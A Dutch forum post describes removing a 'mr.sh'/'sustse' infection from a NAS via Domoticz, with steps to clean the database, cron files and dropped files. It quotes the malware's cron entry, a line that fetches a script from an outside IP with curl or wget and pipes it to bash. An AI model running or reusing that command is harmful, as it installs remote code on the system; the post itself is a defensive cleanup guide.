Samen met mijn zwager nog wat tijd aan gespendeerd...
Vooralsnog lijkt het er op dat ik hem volledig kwijt ben.
Geen piekbelasting meer op de processor, geen actieve processen inzake 'mr.sh' en/of 'sustse'.
Er blijken ook mr.sh regels in de database van Domoticz te staan.
Die heb ik ook verwijderd middels een database editor.
Op deze manier heb ik alles kunnen opschonen:
Domoticz:Open domoticz en maak een backup van de database via 'Instellingen --> Instellingen --> Backup/Herstel --> Backup database'.
Middels een database edit tool de database openen, ik heb hiervoor 'DB Browser for SQLite' gebruikt.
https://sqlitebrowser.org/dl/Open de database file die je hebt opgeslagen.
Op het tabblad 'Browse Data' kun je de tabel 'CustomImages' openen.
Hier zal je een regel in zien staan die ook mr.sh bevat.
Verwijder de regel middels 'Rechtsklik --> Delete Record'.
Sla de wijzigingen op middels de 'Write Changes' knop.
Lees de aanpassing in Domoticz in via 'Instellingen --> Instellingen --> Backup/Herstel --> Database herstellen'.
Herstart Domoticz.
Indien je Domoticz nog niet hebt bijgewerkt naar de laatste versie is dit direct de mogelijkheid dat te doen en het 'lek' te dichten.
http://www.jadahl.com/NAS:Log in op de NAS middels ssh.
Middels de 'vi' editor kunnen de verschillende regels uit de cron bestanden verwijderd worden.
('sudo' voor het openen van de editor met root rechten).
Voer de onderstaande regels uit.
Na het uitvoeren van 1 regel, opent een editor waar de je regel inzake mr.sh zou moeten zien.
(Zoiets: */1 * * * * root (curl -s
http://107.174.47.156/mr.sh||wget -q -O -
http://107.174.47.156/mr.sh)|bash -sh)
Middels de delete knop de regel verwijderen.
Bestand opslaan door ':w' en 'enter'.
vi editor sluiten door ':q' en 'enter'.
Herhaal voor alle 4 bestanden.
sudo vi /etc/cron.d/apache
sudo vi /etc/cron.d/root
sudo vi /var/spool/cron/root
sudo vi /var/spool/cron/crontabs/root
Vervolgens de verschillende aangemaakte bestanden verwijderen met de volgende commando's:
sudo rm /etc/cron.hourly/oanacroner1
sudo rm /var/tmp/sustse
sudo rm /var/tmp/wc.conf
Voor de zekerheid de NAS herstarten!
Let op, als één van de bestanden weer uitgevoerd wordt als je nog niet alles hebt aangepast, kun je opnieuw beginnen.
Misschien de internet verbinding tijdelijk verbreken of net als ik in de firewall het ip adres blokkeren, zodat het script niet succesvol uitgevoerd kan worden.
Voorlopig blijf ik de NAS monitoren om te kijken of er nog wat gebeurt.
Ook heb ik het IP adres nog steeds geblokkeerd in mijn firewall.
Als de NAS stabiel blijft zonder tekenen van sustse en/of mr.sh, ga ik ook de regel uit de firewall halen om te kijken of het terug komt.